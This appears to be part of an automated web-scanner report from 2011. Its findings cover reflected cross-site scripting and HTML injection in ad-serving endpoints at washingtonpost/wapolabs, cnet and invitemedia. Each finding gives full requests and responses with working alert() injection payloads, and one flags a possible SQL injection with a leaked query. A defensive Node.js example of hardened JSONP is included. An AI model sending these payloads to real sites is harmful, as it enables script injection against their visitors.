Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:08 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page4c394<img src=a onerror=alert(1)>bb26c5261f7","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/201
...[SNIP]...

1.240. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [divClass parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the divClass request parameter is copied into the HTML document as plain text between tags. The payload 585f4<img%20src%3da%20onerror%3dalert(1)>f19a341c5f4 was submitted in the divClass parameter. This input was echoed as 585f4<img src=a onerror=alert(1)>f19a341c5f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox585f4<img%20src%3da%20onerror%3dalert(1)>f19a341c5f4&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:06 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox585f4<img src=a onerror=alert(1)>f19a341c5f4","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"vis
...[SNIP]...

1.241. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 8c166<img%20src%3da%20onerror%3dalert(1)>c567a67c1c2 was submitted in the height parameter. This input was echoed as 8c166<img src=a onerror=alert(1)>c567a67c1c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto8c166<img%20src%3da%20onerror%3dalert(1)>c567a67c1c2&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:07 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto8c166<img src=a onerror=alert(1)>c567a67c1c2","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"visId":null,"widthInPixels":"auto"},"adType":nul
...[SNIP]...

1.242. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload 86faa<img%20src%3da%20onerror%3dalert(1)>c3dde673662 was submitted in the keywords parameter. This input was echoed as 86faa<img src=a onerror=alert(1)>c3dde673662 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response; it uses an img onerror event handler, which fires when the bogus src fails to load, rather than a script element.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics86faa<img%20src%3da%20onerror%3dalert(1)>c3dde673662&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:05 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics86faa<img src=a onerror=alert(1)>c3dde673662","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"visId":null,"widthInPixels":"auto"},"adType":null,"adId":"f279fcba-c65
...[SNIP]...

1.243. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the url request parameter is copied into the same JSONP response (a callback wrapper served as text/html, so a direct visit to the URL renders the body as HTML), inside the url string of the JSON object, where it reads as plain text between tags. The payload f3057<img%20src%3da%20onerror%3dalert(1)>992e2108bf2 was submitted appended to the url parameter. This input was echoed as f3057<img src=a onerror=alert(1)>992e2108bf2 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response; it uses an img onerror event handler, which fires when the bogus src fails to load, rather than a script element.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.htmlf3057<img%20src%3da%20onerror%3dalert(1)>992e2108bf2&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:04 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"
...[SNIP]...
ss":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.htmlf3057<img src=a onerror=alert(1)>992e2108bf2","userId":null,"visId":null,"widthInPixels":"auto"},"adType":null,"adId":"f279fcba-c657-11df-8542-1231391009d2","cssUrl":"http://bunsen.wapolabs.com/revplat/prod/1.0/css/widget_4.css","html":"\n<scrip
...[SNIP]...

1.244. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the width request parameter is copied into the widthInPixels string of the same JSONP response, which is served as text/html and therefore rendered as a document when the URL is opened directly; in that rendering the value is plain text between tags. The payload 5abca<img%20src%3da%20onerror%3dalert(1)>78683d983e8 was submitted appended to the width parameter. This input was echoed as 5abca<img src=a onerror=alert(1)>78683d983e8 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response; it uses an img onerror event handler, which fires when the bogus src fails to load, rather than a script element.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto5abca<img%20src%3da%20onerror%3dalert(1)>78683d983e8&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:06 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"
...[SNIP]...
InPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"visId":null,"widthInPixels":"auto5abca<img src=a onerror=alert(1)>78683d983e8"},"adType":null,"adId":"f279fcba-c657-11df-8542-1231391009d2","cssUrl":"http://bunsen.wapolabs.com/revplat/prod/1.0/css/widget_4.css","html":"\n<script type=\"text/javascript\" src=\"http://media.wash
...[SNIP]...
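Findings 1.242 to 1.244 share one root cause: the endpoint builds a JSON object from request parameters, wraps it in a caller-supplied callback name, and serves the result as text/html, so a direct visit renders the body as a document. The following is an added example, not code from the report or from the wapolabs service, that models that pattern in Node.js beside a hardened version. The field names, the callback naming policy and the response shape are assumptions; the keywords payload is the one the report submitted.

```javascript
// Added example (not the wapolabs code). Models a JSONP ad endpoint that
// reflects request parameters into a JSON object wrapped in a callback.
// Field names, callback policy and response shape are assumptions.

// Constructed request, carrying the keywords payload from finding 1.242.
const SAMPLE_QUERY = {
  callback: 'jsonp1297647421325',
  keywords: 'politics86faa<img src=a onerror=alert(1)>c3dde673662',
  width: 'auto',
  height: 'auto',
};

// Vulnerable shape. JSON.stringify escapes quotes and backslashes, so the
// JSON stays well formed, but '<' and '>' pass through untouched. Declared
// as text/html, the body is parsed as markup when the URL is opened directly
// and the img onerror handler fires.
function renderVulnerable(q) {
  const data = { keywords: q.keywords, widthInPixels: q.width, heightInPixels: q.height };
  return {
    headers: { 'Content-Type': 'text/html;charset=UTF-8' },
    body: `${q.callback}(${JSON.stringify({ data })})`,
  };
}

// Hardened shape, three independent controls:
//  1. the callback name must match a strict identifier pattern, so the
//     wrapper itself cannot carry markup or extra statements;
//  2. '<', '>', '&' and the JS line terminators U+2028/U+2029 are emitted as
//     \uXXXX escapes, which both JSON.parse and the JS parser accept, so the
//     body holds no HTML-significant bytes even if it is mis-served;
//  3. the response is declared as JavaScript and marked nosniff, so a browser
//     never treats it as an HTML document.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;

function safeJsonStringify(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(q) {
  if (!CALLBACK_RE.test(q.callback)) {
    throw new Error('invalid callback name');
  }
  const data = { keywords: q.keywords, widthInPixels: q.width, heightInPixels: q.height };
  return {
    headers: {
      'Content-Type': 'application/javascript;charset=UTF-8',
      'X-Content-Type-Options': 'nosniff',
    },
    // The leading comment is a common JSONP convention: the first bytes of
    // the body are then never chosen by the caller.
    body: `/**/${q.callback}(${safeJsonStringify({ data })});`,
  };
}

// Unwraps a hardened JSONP body and parses the argument, to show that the
// escaped form still decodes to the original value for a legitimate caller.
function parseJsonpArgument(body) {
  const m = /^\/\*\*\/[A-Za-z0-9_$]+\(([\s\S]*)\);$/.exec(body);
  if (!m) throw new Error('not a JSONP body produced by renderHardened');
  return JSON.parse(m[1]);
}
```

The third function is the check that matters: a consumer that parses the hardened body gets `politics86faa<img src=a onerror=alert(1)>c3dde673662` back unchanged, so escaping `<` and `>` costs nothing functionally, while the body itself never contains a `<` for an HTML parser to act on. Validating the callback closes the other half of the endpoint: with `callback=` under caller control, the wrapper is as much an injection point as the data.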

1.245. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://pandora.cnet.com
Path:   /api/rest/ddaImageHandler/index.php

Issue detail

The value of the fieldNum request parameter is copied into the HTML document as plain text between tags. The payload 36492<a>8def619f669 was submitted in the fieldNum parameter, appended to its original value (the request reads fieldNum=336492<a>8def619f669), and was echoed unmodified in the application's response.

This behaviour demonstrates that new HTML tags can be injected into the returned document. The scanner did not find a full proof of concept for executing arbitrary JavaScript; the application's behaviour should be examined manually for input validation or other obstacles. Note also what the response actually is: a raw MySQL error ("Unknown column 'img_bin336492' in 'field list'") followed by the failing statement, in which the payload appears verbatim in the column list (SELECT img_bin336492<a>8def619f669 AS bin_data, img_binType336492<a>8def619f669 AS filetype FROM dda2_preview WHERE keyval='2n540drqg0i_2'). The parameter is therefore concatenated into a SQL identifier before it is ever reflected, and the error page discloses the table name and query structure, so this endpoint warrants a SQL injection assessment in addition to the HTML injection recorded here.

Request

GET /api/rest/ddaImageHandler/index.php?fieldNum=336492<a>8def619f669&fuseaction=download&keyval=2n540drqg0i_2 HTTP/1.1
Host: pandora.cnet.com
Proxy-Connection: keep-alive
Referer: http://i.i.com.com/cnwk.1d/Ads/7074/11/moneywatch_carousel_300x250.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:48 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=a14fe6e069362d2f01edda135c5e542d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 248
Content-Type: text/html

Unknown column 'img_bin336492' in 'field list'

<br><br>SELECT img_bin336492<a>8def619f669 AS bin_data, img_binType336492<a>8def619f669 AS filetype FROM dda2_preview WHERE keyval='2n540drqg0i_2'

ses
...[SNIP]...

1.246. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string literal enclosed in single quotation marks, as the src of an img tag written by document.write in a response served as text/javascript. The payload be085'%3balert(1)//2a45c87cfb4 was submitted in the admeld_callback parameter. This input was echoed as be085';alert(1)//2a45c87cfb4 in the application's response.

This proof of concept demonstrates that the parameter can terminate the string literal and inject arbitrary JavaScript. Two caveats apply to this particular reflection. First, as echoed, the ; ends the statement while the document.write( call is still open and the // comments out its closing '); on the same line, so the script as shown is a syntax error and the alert does not run; a payload that keeps the call balanced, for example string concatenation of the form '+alert(1)+', is needed to confirm execution. Second, the response is Content-Type: text/javascript, which a browser displays rather than renders when visited directly; the injected code runs in the origin of whichever page includes this URL in a script element, which is how a cookie-sync tag such as this is normally loaded.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbe085'%3balert(1)//2a45c87cfb4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; 
segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="...[SNIP]..."

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 14 Feb 2011 02:34:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 14-Feb-2011 02:34:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1076

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchbe085';alert(1)//2a45c87cfb4?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1298082882&custom_user_segments=%2C11265%2C30211%2C8%2C28686%2C5379%2C24085%2C17440%2C28709%2C28710%2C39975%2C
...[SNIP]...

1.247. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /rubicon_sync

Issue detail

The value of the publisher_redirecturl request parameter is copied into the src attribute of an img tag, enclosed in double quotation marks, in a response served as text/html. The payload 6a53e"><script>alert(1)</script>e268ea4feb8 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response, where the "> closes the attribute and the img tag and the script element that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/6a53e"><script>alert(1)</script>e268ea4feb8 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
